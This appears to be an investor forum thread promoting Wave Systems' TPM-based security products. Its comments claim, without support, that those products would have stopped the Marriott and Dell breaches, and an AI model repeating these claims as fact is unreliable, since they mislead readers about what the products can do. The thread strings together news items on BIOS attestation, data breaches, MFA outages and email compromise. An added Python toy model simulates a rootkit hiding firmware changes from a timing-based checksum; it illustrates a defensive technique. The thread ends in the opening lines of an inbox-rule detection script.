Wave Systems Corp. (NASDAQ:WAVX), the Trusted Computing Company, announced plans to integrate The MITRE Corporation’s new timing-based attestation technique into Wave Endpoint Monitor (WEM), the industry’s first solution to leverage industry standard hardware to detect and remediate malware that can surreptitiously mount attacks before the operating system loads. MITRE is a not-for-profit organization that provides systems engineering, research and development, and information technology support to the government.
With this enhancement, Wave will integrate MITRE’s technique that doubly verifies that the core BIOS hasn’t been corrupted. The BIOS is the first software run by the PC when powered-on and is responsible for initializing hardware and getting the operating system running. It also contains the “core root of trust for measurement” (CRTM) software, the first software in the boot trust chain that ends in the assurance that the computer booted safely.
“MITRE has made a significant contribution to the body of research by identifying a scenario in which malicious code could be introduced to the BIOS that would cause it to provide a false reading and allow the malicious BIOS to indicate the system had not been corrupted,” said Dr. Robert Thibadeau, Wave’s Chief Scientist. “MITRE’s technique offers a second control for determining the CRTM does not lie about itself and any of the rest of the trust chain.”
Dr. Thibadeau added, “While BIOS attacks are still fairly rare today—less than one percent by many accounts—they represent a new and dangerous attack vector, and we’re bound to see more in future years as the more popular preboot targets are secured by our existing WEM technology.”
The management of CRTM detection will be incorporated in a module for WEM, which Wave expects will be production-ready in early 2014 to meet the expected increase of these attacks. Wave Endpoint Monitor captures verifiable PC health and security by utilizing information stored within the TPM. If anomalies are detected, the attack is controlled, and IT is alerted immediately with real-time analytics.
MITRE research presented at Black Hat 2013
MITRE researchers John Butterworth, Corey Kallenberg, and Xeno Kovah presented their research on this vulnerability and technique, “BIOS Chronomancy: Fixing the Core Root of Trust for Measurement,” at Black Hat 2013.
The team’s research highlights a vulnerability in which a firmware rootkit tricks an endpoint’s Trusted Platform Module (TPM) chip into reporting a clean BIOS firmware, when in fact it has been compromised. MITRE’s research shows the importance of using timing-based attestation systems, which can defend against attackers who obtain the same privilege levels as the defender. John Butterworth, a Senior Infosec Engineer at MITRE, adds, “additional complexities are imposed on an attacker who tries to conceal a rootkit in the presence of timing-based attestation; even concealing the modification of a single byte will trigger a measurable change.”
The team’s findings come as vendors work to implement BIOS protection specifications as outlined by the National Institute of Standards and Technology (NIST) special publication 800-155, published in 2011.
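The press release states the problem (a firmware rootkit tricks the TPM into reporting a clean BIOS) and the MITRE remedy (timing-based attestation, where even concealing a single modified byte produces a measurable change) without showing why. The script below is an added toy model of that argument, not MITRE's Chronomancy code or Wave's WEM: a lying CRTM simply replays the hash it recorded before the patch, a verifier nonce forces it to actually walk the flash, and a rootkit that keeps a clean shadow copy and redirects reads of the patched range gets the checksum right but pays an address check on every read, which is the cost the timing measurement exposes. The firmware image, patch offset, rootkit bytes, nonce and walk constants are all constructed for the illustration, and the timing ratio is reported rather than asserted because it depends on the machine.

```python
"""Toy model of the argument behind "BIOS Chronomancy". Added illustration,
constructed data; not MITRE's or Wave's code."""
import hashlib
import random
import time

random.seed(7)
FLASH_SIZE = 8192
CLEAN_FIRMWARE = bytes(random.getrandbits(8) for _ in range(FLASH_SIZE))  # constructed image
PATCH_OFFSET = 1337                       # constructed: where the rootkit lives
ROOTKIT = b"\xeb\xfe"                     # two patched bytes, placeholder content
DIRTY_FIRMWARE = (CLEAN_FIRMWARE[:PATCH_OFFSET] + ROOTKIT
                  + CLEAN_FIRMWARE[PATCH_OFFSET + len(ROOTKIT):])
PATCHED = range(PATCH_OFFSET, PATCH_OFFSET + len(ROOTKIT))
MASK = 0xFFFFFFFF
ROUNDS = 2 * FLASH_SIZE                   # odd stride mod 2^13 visits every byte twice


def static_measurement(image: bytes) -> str:
    """What a conventional CRTM extends into the TPM: a hash of the image it measures."""
    return hashlib.sha256(image).hexdigest()


def lying_crtm_report(recorded_clean_hash: str) -> str:
    """A compromised CRTM measures nothing; it replays the value it recorded before
    the patch, so the TPM and anything reading its PCRs see a 'clean' BIOS."""
    return recorded_clean_hash


def timed_checksum(read, nonce: int):
    """Nonce-seeded walk over flash folding every byte into a 32-bit state.
    Returns (checksum, elapsed_seconds); the verifier compares both against a
    reference taken from a known-good machine."""
    state = nonce & MASK
    t0 = time.perf_counter()
    for i in range(ROUNDS):
        addr = (nonce + i * 0x9E3779B1) % FLASH_SIZE
        state = ((state * 0x01000193) ^ read(addr) ^ i) & MASK
    return state, time.perf_counter() - t0


def honest_read(image: bytes):
    """The device reads its own flash directly."""
    return image.__getitem__


def concealing_read(dirty: bytes, clean: bytes):
    """Rootkit strategy against a nonce: keep a clean copy and redirect reads of the
    patched range to it. The per-read address check is the cost timing exposes."""
    def read(addr):
        return clean[addr] if addr in PATCHED else dirty[addr]
    return read


def run_demo() -> dict:
    clean_hash = static_measurement(CLEAN_FIRMWARE)
    nonce = 0x5EEDC0DE  # constructed; a real verifier draws a fresh one per attestation
    expected, t_honest = timed_checksum(honest_read(CLEAN_FIRMWARE), nonce)
    naive, _ = timed_checksum(honest_read(DIRTY_FIRMWARE), nonce)
    concealed, t_conceal = timed_checksum(concealing_read(DIRTY_FIRMWARE, CLEAN_FIRMWARE), nonce)
    return {
        "dirty_hash_differs": static_measurement(DIRTY_FIRMWARE) != clean_hash,
        "static_check_fooled": lying_crtm_report(clean_hash) == clean_hash,
        "naive_rootkit_caught": naive != expected,
        "concealing_rootkit_value_ok": concealed == expected,
        "concealing_slowdown": t_conceal / t_honest if t_honest else float("inf"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The three boolean results are the whole argument: the static hash is fooled, the nonce catches a rootkit that does nothing to hide, and a rootkit that does hide passes on value, so the only signal left is the slowdown, which is why the real technique also measures the checksum's own code and calibrates the expected time per platform.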
==================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
White House Identifies Financial Industry as Key Cybersecurity Focus Area
https://biztechmagazine.com/article/2018/11/white-house-identifies-financial-industry-key-cybersecurity-focus-area
On the heels of fresh scrutiny for banks, the Trump administration affirmed financial services companies as a top target for cyberattacks.
The Trump administration recently published a revised National Cyber Strategy, which identifies banking and finance as one of seven key areas where the White House will strive to reduce cybersecurity risks. The administration’s work with the financial industry will build upon months of recommendations from private and public organizations on how to protect America’s most attractive sector for cyberattacks.
“The Administration will develop a comprehensive understanding of national risk by identifying national critical functions and will mature our cybersecurity offerings and engagements to better manage those national risks. The Administration will prioritize risk-reduction activities across seven key areas,” including banking and finance, the strategy states.
Earlier this year, the Council of Economic Advisers estimated that malicious cyberactivity cost the U.S. economy between $57 billion and $109 billion in 2016. The financial services industry proved a particularly attractive target for hackers that year. “It was attacked 65 percent more than the average organization across all industries, and according to IBM, 200 million financial services records were breached in 2016, a 900 percent increase from 2015,” reports Security magazine.
For financial services firms, public and private entities have instituted requirements to mitigate the damage from cyberattacks. The federal government also requires cyber disclosures from the banking industry. Banks and certain financial institutions must undergo reviews of “their safeguards for protecting the security, confidentiality, and integrity of consumer information, which include disclosure requirements in the event of a breach,” states the Council of Economic Advisers.
Meanwhile, a financial services consortium — composed of Bank of America, JPMorgan Chase, Wells Fargo and American Express — set up TruSight, a company that provides risk assessments of third-party suppliers and partners, including cybersecurity vendors.
Cyberattacks Pose Extra Dangers for Financial Institutions
Cyberdefenses for financial services firms have been top of mind for the industry since the Equifax breach in 2017. In that breach, “more than 147 million people in the U.S. had personal and financial data stolen ranging from Social Security and driver’s license numbers to credit card information and birth dates,” notes SecurityInfoWatch.com.
Experts warn that banks not only suffer direct financial losses due to successful cyberattacks, but also suffer indirect losses. In an interview with The Wall Street Journal at the end of last year, CrowdStrike CEO George Kurtz warned of the danger to banks of shutting down during a cyberattack.
“When you can’t trade, when you are under attack, there is a loss of confidence in that particular institution. Some of these institutions, if they’re out of business or they’re not operational, it’s a massive ripple,” Kurtz said.
In the same interview, Barclays Group Security Division CIO Elena Kvochko prescribed a holistic approach to cybersecurity for banks.
“No matter how you structure your technology teams, what’s important is to be able to have a holistic perspective across your business lines and product lines, to be able to see there is an anomaly or an incident happening in one part of the organization, you’re able to connect it to potentially other related events that are happening,” Kvochko said.
Implementing a new process could require three months to a year before it becomes a habit — and thus part of the security culture — within an institution, Kvochko added.
-rest is at the link.
=================================================================
If someone in Trump's office was aware of the two factor authentication that exists in the financial services industry, they'd be happy to see the 2FA displaced with Wave VSC 2.0. imo.
=================================================================
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
US Senate computers will use disk encryption
https://www.zdnet.com/article/us-senate-computers-will-use-disk-encryption/
New security measure is meant to protect sensitive Senate data on stolen Senate laptops and computers
The US Senate will enable disk encryption on all Senate computers as a basic security measure that will make it harder for spies or criminals to extract sensitive data from stolen Senate staff PCs or hard drives.
The decision was taken last month by the Senate Committee on Rules and Administration, which instructed the Senate Sergeant at Arms (SAA) to begin the data encryption process.
"I applaud these efforts as this new common-sense cybersecurity policy will better protect sensitive Senate data from those who might wish to compromise it," said Oregon Democrat Senator Ron Wyden, the one who initially pushed the Committee to implement this measure over the summer.
"This new policy will make it much harder for any would-be spy or criminal who steals a Senate computer to access Senate data," Sen. Wyden added. "This is particularly important for laptops, which are more vulnerable to foreign government surveillance when Senate staff take them home or on work-related travel."
Details about the exact timeline or progress of the disk encryption process have not been made available, but Senators and their staff should hope this doesn't go as badly as the adoption of multi-factor authentication. A government report published in September revealed that only 11 percent of the Department of State's devices used multi-factor authentication.
It is also no surprise that Sen. Wyden was behind the push to have the Senate deploy disk encryption. Previously, the same Senator had also asked the government to stop using Adobe Flash on its computers and sites, urged the DOD to move all of its sites to HTTPS by the end of the year, asked the White House Cybersecurity Coordinator to deploy a solution that blocks ads on US government networks and computers to ward off malvertising, and has pressed the DHS to deploy an emerging technology called Encrypted Server Name Indication (ESNI).
He also called out the FBI director's 'ill-informed' views on encryption backdoors, pushed Verizon, Sprint, AT&T, and T-Mobile to stop sharing real-time cell phone location data with third-party companies, revealed that US border officials haven't properly verified visitor passports for more than a decade, and asked the FCC to find out whether police stingrays disrupt 911 calls.
=================================================================
Wave's MFA (multi factor authentication) should be benefiting those employees in the U.S. government as it has been tested and used there (see PR below). And Wave's other main product SED management should also be used in the U.S. government. imo. (see link below) Two amazing products under one company that could protect the government in a big way! At least with this announcement, the Senate is leading what could be a fresh movement in the market for Wave's encryption management!
================================================================
Wave Systems Announces First U.S. Federal Government Customer for Wave Virtual Smart Card 2.0
https://www.wavesys.com/buzz/pr/wave-systems-announces-first-us-federal-government-customer-wave-virtual-smart-card-2.0
Lee, MA -
October 2, 2014 -
Wave Systems Corp. (NASDAQ: WAVX) marked an important sales milestone by announcing the first U.S. federal government customer for its Virtual Smart Card 2.0.
Since the Virtual Smart Card 2.0 became commercially available in late July 2014, Wave has entered into dozens of pilot deployments in multiple sectors, including healthcare, financial services, automotive, energy and utilities. However, today’s announcement marks the product’s first sale in the government sector.
“This is an important milestone for Wave,” said Bill Solms, CEO of Wave. “Wave Virtual Smart Card 2.0 has been purchased by a government agency with significant security requirements and one that requires redundant means of system authentication due to national security interests. This initial sale is modest compared to the addressable market within the Federal Government sector, but it is important to our strategy for marketing the Virtual Smart Card to address critical government infrastructure defense.”
“We believe that this sale, which was completed on a shorter sales cycle than we had anticipated, supports our view that customers are interested in the type of cyber security solution that Wave’s Virtual Smart Card 2.0 provides,” Solms added.
Wave Virtual Smart Card 2.0 is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7. It also supports Windows 8 and 8.1. Wave’s new solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, lower total cost of ownership, and a reduced risk of unauthorized use.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure PIN and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with TPM 1.2 or TPM 2.0
=================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Excerpt:
No SEDs yet? No problem.
If your organization hasn’t yet deployed SEDs, you can skip the process of retro-fitting and simply incorporate SEDs on all new laptops as part of your regular refresh cycle. In the meantime, the same Wave console can manage BitLocker and SEDs, so you can protect the devices you have now with BitLocker and add those with SEDs as they are deployed. And if you’re using Wave’s cloud platform, you can also support OSX FileVault2.
2014 Marriott Data Breach Exposed, 500M Guests Impacted
https://threatpost.com/2014-marriott-data-breach-exposed-500m-guests-impacted/139507/
The hackers had access to the impacted database since 2014.
Marriott said that a massive data breach of its guest reservation system has left up to 500 million guests’ data exposed and available for the taking. Worse, the attackers may have had access to the systems for at least four years before being discovered.
The hotel company said in a statement on its website that hackers gained access to the Starwood reservation database. Starwood, which includes hotels like St. Regis and Sheraton, was bought by Marriott in 2016.
The hackers gained unauthorized access to Starwood’s network back in 2014. Marriott said it discovered the breach on Sept. 8.
“The company has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property,” the company said in its statement.
Marriott did not respond to a request for comment about how the database was accessed.
Marriott said that hackers stole data like name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences for 327 million of these guests.
For others, information stolen also includes payment card numbers and payment card expiration dates. The payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128), stressed the company.
“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken,” the company said. “For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information.”
Security experts, such as Daniel Cuthbert, global head of cyber security research at Banco Santander, were astounded that the hack has been ongoing for four years without discovery.
Marriott has also had minor security issues in the past. Kevin Beaumont pointed back to past security incidents with Marriott wherein a remote access trojan located inside the company’s network had access to their Cyber Incident Response Team mailbox in 2017.
Backlash
The incident has left infosec community members and hotel guests scratching their heads about how the hackers could have stayed undetected for four years.
“Four years of unauthorized access is an eternity for hackers, so members of the Starwood rewards program need to keep a close eye on their balances, as attackers will often try to steal and monetize rewards points,” said Ben Johnson, co-founder and CTO of Obsidian Security. “While the recognition of the breach and an apology are important steps forward, Marriott must upgrade its ability to detect compromises like this much faster, and should move swiftly to protect the rewards accounts and personal information of its loyal members.”
Brian Vecci, technical evangelist at Varonis, pointed to the breach as a “textbook” example of how hackers are becoming smarter about building persistence when they breach critical systems.
“Threat actors are smart and getting smarter so it’s hard to catch them in the act, but not only did Marriott fail to protect customer records, they failed to detect the leakage of this data since 2014,” he said. “This breach is a textbook example of attacker dwell time, and how once an attacker compromises an organization their goal is not typically to smash and grab, but to build persistence mechanisms and backdoors to stay in a network and continue to steal critical information year after year.”
Meanwhile, the New York Attorney General’s office declared it was opening an investigation into the Marriott data breach. “New Yorkers deserve to know that their personal information will be protected,” NY Attorney General Barbara Underwood said in a Tweet.
Marriott said it will begin sending emails on a rolling basis starting today, November 30, 2018, to affected guests whose email addresses are in the Starwood guest reservation database.
misc. twitter posts in article are at the link-
=================================================================
Remote Access Trojan (or RAT) above could have been prevented by Wave Endpoint Monitor. Also, Wave VSC 2.0 and Wave ERAS could have kept the bad guys (unknown devices) from ever entering the network in the first place. The Wave VSC 2.0 White Paper introduction makes reference to some of the old mega breaches, and Wave VSC 2.0 if used was meant to prevent or stop those mega breaches like those from ever happening. Organizations (Marriott) continue to have mega breaches in part because they haven't found a two factor authentication (2FA) solution like Wave VSC 2.0 and Wave Endpoint Monitor as well. imo.
=================================================================
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Cyber-threats are everywhere, but with Wave Virtual Smart Card 2.0 (Wave VSC 2.0) enterprises have a hardware-based, tokenless, two-factor authentication security solution with the security of a hardware token solution and the convenience and cost savings of a software token solution.
Wave VSC 2.0 delivers strong two-factor authentication using the Trusted Platform Module (TPM), the embedded security chip built into enterprise PCs. Wave empowers IT with management of the TPM and VSC 2.0. Companies successfully use Wave VSC 2.0 to secure VPN access, web applications and other certificate-based applications, like Wi-Fi with 802.1x, remote desktop, or Windows-user login. Use the security that’s already been deployed and save money with Wave VSC 2.0.
Every month we see headlines highlighting mammoth breaches (i.e. EBay, JP Morgan Chase, Sony, Target, etc…). In each case, millions of records were stolen, corporate images were tarnished, and enormous costs were incurred as a result. And equally disturbing, more often than not the attacks go undetected and as a result important information is stolen.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Dell announces security breach
https://www.zdnet.com/article/dell-announces-security-breach/
Company says it detected an intrusion at the start of the month, but financial data was not exposed.
US-based hardware giant Dell announced today a security breach that took place earlier this month, on November 9.
Dell says it detected an unauthorized intruder (or intruders) "attempting to extract Dell.com customer information" from its systems, such as customer names, email addresses, and hashed passwords. The company didn't go into details about the complexity of the password hashing algorithm, but some of these --such as MD5-- can be broken within seconds to reveal the plaintext password.
"Though it is possible some of this information was removed from Dell's network, our investigations found no conclusive evidence that any was extracted," Dell said today in a press release.
In a statement sent to ZDNet, Dell said it's still investigating the incident, but said the breach wasn't extensive, with the company's engineers detecting the intrusion on the same day it happened. A Dell spokesperson declined to give out a number of affected accounts, saying "it would be imprudent to publish potential numbers when there may be none."
The company also said hackers didn't target payment card or any other sensitive customer information, and that the incident didn't cause a disruption of its normal services at the time of the breach or after.
Dell initiated a password reset for all Dell.com customer accounts after it detected the intrusion earlier this month.
The company said it notified law enforcement, and also hired a digital forensics firm to perform an independent investigation.
Based on currently revealed details, Dell appears to have exposed very little information associated with its official website, where most users come to shop official products or have discussions on its official support forums.
While Dell has downplayed the incident's impact, it is worth mentioning that many breached companies amend these initial revelations as their investigations advance.
Besides resetting passwords, Dell.com users should manually review what information they've stored in their respective accounts. In case they've saved financial information, they should keep an eye on card statements, to be on the safe side.
=================================================================
Wave VSC 2.0 and Wave ERAS could have prevented the intruder (unknown device) from accessing the Dell network. Dell owns RSA Securid and was probably using that two factor authentication to try to limit exposure to their network. RSA Securid doesn't have the feature of keeping unknown devices off the network (as revealed in the article) in a more effective way than Wave does. imo. see below.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
=================================================================
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Microsoft's multi-factor authentication service goes down for second week in a row
https://www.zdnet.com/article/microsofts-multi-factor-authentication-service-goes-down-for-second-week-in-a-row/
Another Microsoft Azure Active Directory multi-factor authentication service outage is causing problems for a number of Office 365 users.
Just over a week after a global problem with its multi-factor authentication (MFA) service plagued a number of users, another Microsoft MFA outage is impacting a number of customers. Many, but not all, of the customers reporting problems today seem to be U.S.-based.
Starting around 9:15 a.m. ET, a number of Office 365 customers began reporting on Twitter that they were unable to sign into that service because of an MFA issue. Office 365 is one of a number of Microsoft services that uses Azure Active Directory MFA to authenticate.
Around 10:15 a.m. ET, Microsoft's Azure status dashboard was updated to reflect the possibility of a cross-region potential outage impacting MFA.
"Impacted customers may experience failures when attempting to authenticate into Azure resources where MFA is required by policy. Engineers are investigating the issue and the next update will be provided in 60 minutes or as events warrant," the dashboard status said.
The Microsoft 365 Status account on Twitter noted around 10:38 a.m. ET:
"We're investigating an issue where users may be unable to sign in using Multi-Factor Authorization (MFA). All details can be found under Service Incident (SI) #MO165847."
For 14 hours on November 19, Microsoft's MFA services went down for many Microsoft customers.
Microsoft's Azure team recently went public with the root cause it discovered when investigating the outage. Microsoft unearthed three independent root causes, along with monitoring gaps that resulted in Azure, Office 365, Dynamics and other Microsoft users not being able to authenticate for much of that day. Microsoft officials described a multi-pronged plan to try to keep this kind of outage from happening, but said some of the required steps might not be completed until January 2019.
Update (11:40 a.m. ET): The mitigation has begun. From the Azure status page:
"CURRENT MITIGATION: Engineers are currently in the process of cycling backend services responsible for processing MFA requests. This mitigation step is being rolled out region by region with a number of regions already completed. Engineers are reassessing impact after each region completes."
Update (12:25 pm ET): As the mitigation continues, Microsoft engineers say they've identified the cause of today's issue. From the Azure status page:
"Engineers have also determined a Domain Name System (DNS) issue caused sign-in requests to fail, but this issue is mitigated and engineers are restarting the authentication infrastructure."
On the Azure status page, Microsoft officials say a full root-cause analysis of today's outage will be posted within 72 hours.
==================================================================
Given Microsoft's experience with 2FA and what has been going on with Windows 10, 1809 upgrades, it seems that Wave VSC 2.0 could be the better way to go for a lot of organizations' 2FA.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
White paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Multifactor Authentication Market to be worth US$20444.9 Million by 2025; Strict Rules by Government to Guard and Preserve National Secrets Bolsters Market Growth - TMR
https://globenewswire.com/news-release/2018/11/26/1656656/0/en/Multifactor-Authentication-Market-to-be-worth-US-20444-9-Million-by-2025-Strict-Rules-by-Government-to-Guard-and-Preserve-National-Secrets-Bolsters-Market-Growth-TMR.html
Global Multifactor Authentication Market: Governments to Boost Uptake as Need for Better Security Measures Grows, observes TMR
Albany, New York, Nov. 26, 2018 (GLOBE NEWSWIRE) -- According to the recent study by Transparency Market Research, the global multifactor authentication market is likely to expand at a robust CAGR of 17.7% during the tenure period. The market, which was valued at US$4829.2 mn by the end of 2016, is foreseen to rise and reach a valuation of US$20444.9 mn by the end of the assessed period. On the basis of models, the market is segmented into three-factor authentication, four-factor authentication, and two-factor authentication. Of these, the two-factor authentication market is predicted to witness stellar demand as consumers have started preferring the two-step verification process. On the basis of region, the multifactor authentication market is likely to be dominated by North America, as the region experiences a surge in adoption of multifactor authentication models due to increasing security concerns.
The global multifactor authentication market is predicted to witness strong growth during the forecast period 2017 – 2025, owing to a rise in demand for better security solutions. Transparency Market Research notices that the market is highly fragmented in nature owing to the presence of several players. Senior analysts expect that strategic partnerships such as mergers and acquisitions taken up by key players are likely to help give them a strong foothold in untapped markets. Players are spending hefty amounts on research and development activities to innovate and introduce more efficient and enhanced products for consumers. This is likely to drive the multifactor authentication market in a forward direction. It is anticipated that as the number of players increases, the competition will become more intense. Some of the major players in the multifactor authentication market are Vasco, EMC, Entrust, and Gemalto.
rest is at the link -
=================================================================
'Better security at less than half the cost' should make Wave a major player in the multifactor authentication market with Wave VSC 2.0!! imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases:
  ◦ Virtual Private Network (VPN)
  ◦ Local logon
  ◦ Remote logon
  ◦ Remote desktop access
  ◦ Intranet/Extranet
  ◦ Cloud applications
=================================================================
White paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Attackers Are Landing Email Inboxes Without the Need to Phish
https://www.securityweek.com/attackers-are-landing-email-inboxes-without-need-phish
We’ve all heard the proverb: Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime. Well now, threat actors don’t even have to exert the effort to phish to land business email accounts.
According to an alert published earlier this year by the FBI, Business Email Compromise (BEC) and Email Account Compromise (EAC) have caused $12 billion in losses since October 2013. Traditionally, social engineering and intrusion techniques have been the most common ways to gain access to business email accounts and dupe individuals to wire funds to an attacker-controlled account. These methods play out as follows:
1. Social engineering and email spoofing: Attackers will use social engineering to pose as a colleague or business partner and send fake requests for information or the transfer of funds. These emails can be quite convincing as the attacker makes a significant effort to identify an appropriate victim and register a fake domain, so that at first glance the email appears to belong to a colleague or supplier.
2. Account takeover: Here, attackers use information-stealing malware and key loggers to gain access to and hijack a corporate email account, which they then use to make fraudulent requests to colleagues, accounting departments and suppliers. They can also alter mailbox rules so that the victim’s email messages are forwarded to the attacker, or emails sent by the attacker are deleted from the list of sent emails.
These techniques have served threat actors well for quite some time. But now we are seeing new, more expeditious methods emerge to gain access to business email accounts. Compromised credentials being offered on criminal forums, exposed through third-party compromises, or vulnerable through misconfigured backups and file sharing services, make the opportunity to profit from BEC easier than ever. Email inboxes are also being used not just to request wire transfers, but to steal financially-sensitive information stored within these accounts or to request information from other employees. With declining barriers to entry for BEC, and more ways to monetize this type of fraud, we can expect the losses to continue to rise and perhaps even accelerate in the near term.
Here’s how these alternative methods work:
1. Paying for access. It’s common for accounts to be shared and sold across criminal forums, and the emails of finance departments and CEO/CFOs are no exception. It’s even possible to outsource this work to online actors who will acquire company credentials for a percentage of earnings or a set fee beginning as low as $150.
2. Getting lucky with previously compromised credentials. As I’ve discussed before, individuals will often reuse passwords across multiple accounts. In our research we’ve detected more than 33,000 finance department email addresses exposed within our own third-party data breach repository, 83 percent of which had passwords associated. With many email and password combinations of finance department email accounts already compromised, cybercriminals can get lucky.
3. Searching across misconfigured archives and file stores. Inboxes, particularly those of finance departments and CEO/CFOs, are replete with financially-sensitive information such as contract scans, purchase orders, and payroll and tax documents. This information can be used for fraud or re-sold on forums and marketplaces. The sad reality is that there’s no need to go to a dark web market when sensitive data is available for free on the open web. Employees and contractors sometimes turn to easy, rather than secure, ways of archiving their emails. We identified that more than 12.5 million email archive files and 50,000 emails that contained “invoice”, “payment” or “purchase order” have been exposed due to unauthenticated or misconfigured file stores.
Regardless of the method attackers use to perform a BEC scam, these seven security measures can help to mitigate the risks.
1. Update your security awareness training content to include the BEC scenario. This should be a part of new hire training, but you should conduct ad-hoc training for this scenario now.
2. Build BEC into your contingency plans, just as you have built ransomware and destructive malware into your incident response/business continuity planning.
3. Work with your wire transfer application vendors to build in manual controls as well as multiple person authorizations to approve significant wire transfers.
4. Monitor for exposed credentials. This is crucial for your finance department email, but it’s important for all user accounts. Multifactor authentication will also increase the difficulty for attackers to perform account takeovers.
5. Conduct ongoing assessments of your executives’ digital footprints. You can start with using Google Alerts to track new web content related to them.
6. Prevent email archives from being publicly exposed. For services like Server Message Block (SMB), rsync and the File Transfer Protocol (FTP), use a strong, unique password and disable guest or anonymous access and firewall the port off from the Internet. If it needs to be on the Internet or without a password, then make sure you whitelist the IPs which are expressly permitted to access the resource.
7. Be aware of the risks of contractors who back up their emails on Network Attached Storage (NAS) devices. Users should add a password and disable guest/anonymous access, as well as opt for NAS devices that are secured by default. Ideally, organizations should provide training on the risks of using home NAS drives, as well as offer backup solutions so that contractors and employees don’t feel the need to back up their devices at home.
BEC is becoming increasingly profitable for threat actors as organizations are making it easy for adversaries to gain access to the valuable information that sits within these inboxes. However, with the right combination of people, processes and technology, organizations can mitigate the risk.
=================================================================
A great feature of Wave VSC 2.0 imo is that it isn't susceptible to keyloggers since the user is automatically logged into the site without entering a password. Wave VSC 2.0 could be a big help here!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
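The BEC article quoted above describes account takeover where the attacker edits mailbox rules to auto-forward the victim's mail or to delete the messages the attacker sent. The following is an added detection example (not from the article, Wave, or any mail vendor) that reviews exported inbox rules for those patterns; the rule records and field names are constructed for illustration and do not follow any real platform's schema, and `example.com` is assumed to be the organisation's own domain.

```python
"""Flag inbox rules typical of BEC account takeover: external auto-forwarding,
deletion from Sent Items, and rules that hide financial mail from the user.
Added example; rule data below is constructed, not a real audit export."""
from dataclasses import dataclass, field
from typing import List, Optional

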